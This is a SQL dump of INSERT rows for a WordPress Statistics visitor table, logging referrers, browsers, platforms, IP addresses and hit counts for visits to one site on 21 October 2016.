INSERT INTO `wp_statistics_visitor` VALUES (9280, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '42.60.136.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9281, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.219.123.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9282, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.74.186.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9283, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.24.196.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9284, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.81.33.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9285, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.168.186.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9286, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.17.230.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9287, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.79.58.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9288, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.60.89.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9289, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.70.190.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9290, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.101.104.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9291, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.155.192.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9292, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.205.149.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9293, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.75.202.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9294, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.1.54.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9295, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.81.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9296, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.117.79.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9297, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '70.71.155.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9298, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '10.10.10.25', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9299, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.133.108.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9300, '2016-10-21', 'https://www.google.com.ec/', 'Chrome', 'Windows', '53.0.2785.143', '', '186.46.205.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9301, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.1.202.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9302, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.107.146.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9303, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.143.97.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9304, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.54.141.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9305, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '144.76.31.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9306, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '114.44.219.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9307, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.46.145.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9308, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.73.129.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9309, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.50.28.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9310, '2016-10-21', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '180.153.186.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9311, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.153.246.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9312, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.185.248.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9313, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '152.249.101.208', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9314, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.4.33.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9315, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.16.147.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9316, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '134.196.96.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9317, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.71.6.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9318, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.146.91.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9319, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.106.7.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9320, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.130.22.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9321, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.170.6.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9322, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.51.208.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9323, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.79.41.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9324, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.89.232.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9325, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.46.96.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9326, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.97.169.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9327, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.125.96.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9328, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.125.88.64', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9329, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.177.36.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9330, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '66.168.179.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9331, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.228.154.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9332, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.176.181.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9333, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.139.120.117', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9334, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.207.189.163', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9335, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.99.17.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9336, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.209.8.160', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9337, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.193.41.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9338, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '51.255.56.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9339, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.193.72.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9340, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.67.43.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9341, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '107.185.16.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9342, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.129.210.174', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9343, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.106.157.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9344, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.75.110.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9345, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.57.185.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9346, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.29.130.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9347, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.47.226.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9348, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.175.61.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9349, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.61.160.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9350, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.176.80.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9351, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.251.70.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9352, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.229.213.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9353, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.29.239.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9354, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.79.213.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9355, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.212.72.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9356, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.106.241.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9357, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.216.9.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9358, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '211.61.23.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9359, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.229.60.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9360, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.80.100.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9361, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.69.65.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9362, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.205.94.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9363, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.200.154.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9364, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '219.92.14.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9365, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '107.208.96.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9366, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '129.208.62.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9367, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.15.154.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9368, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '72.189.111.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9369, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.219.44.51', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9370, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.7.13.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9371, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '130.105.189.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9372, '2016-10-21', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '168.122.10.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9373, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.124.88.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9374, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.191.220.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9375, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.153.235.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9376, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '30.0', '', '54.224.229.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9377, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '126.28.165.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9378, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.139.135.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9379, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.74.190.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9380, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.152.92.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9381, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.52.80.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9382, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Android', '38.0.2125.102', '', '198.223.230.18', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9383, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.0.188.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9384, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.31.65.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9385, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.137.65.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9386, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.78.221.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9387, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.177.162.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9388, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.163.72.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9389, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.40.25.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9390, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.244.231.106', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9391, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.106.115.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9392, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.207.203.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9393, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.203.37.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9394, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.246.29.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9395, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '191.253.118.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9396, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.95.7.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9397, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.94.91.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9398, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '130.105.79.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9399, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.249.70.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9400, '2016-10-21', 'https://www.miller-stephenson.com', 'doczz', 'Unknown', 'Unknown', '', '78.47.27.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9401, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.93.77.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9402, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.220.21.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9403, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.102.242.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9404, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.32.72.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9405, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '165.120.210.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9406, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.206.106.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9407, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.159.127.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9408, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.176.142.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9409, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.97.150.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9410, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.105.27.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9411, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '101.182.144.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9412, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.169.45.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9413, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.217.54.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9414, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.7.102.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9415, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '51.36.82.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9416, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.0.190.87', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9417, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '96.18.33.38', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9418, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.102.123.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9419, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.148.6.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9420, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.106.123.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9421, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.124.190.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9422, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.224.164.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9423, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.242.156.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9424, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.235.14.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9425, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.185.112.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9426, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.247.79.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9427, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.15.163.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9428, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '205.206.132.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9429, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.105.253.248', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9430, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.231.28.48', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9431, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.136.108.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9432, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.193.81.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9433, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.218.177.219', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9434, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.209.27.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9435, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.179.204.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9436, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.68.39.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9437, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.220.212.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9438, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.2.88.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9439, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.90.253.25', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9440, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.254.7.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9441, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.73.237.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9442, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.133.229.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9443, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.69.113.159', '000', 3, 0); 
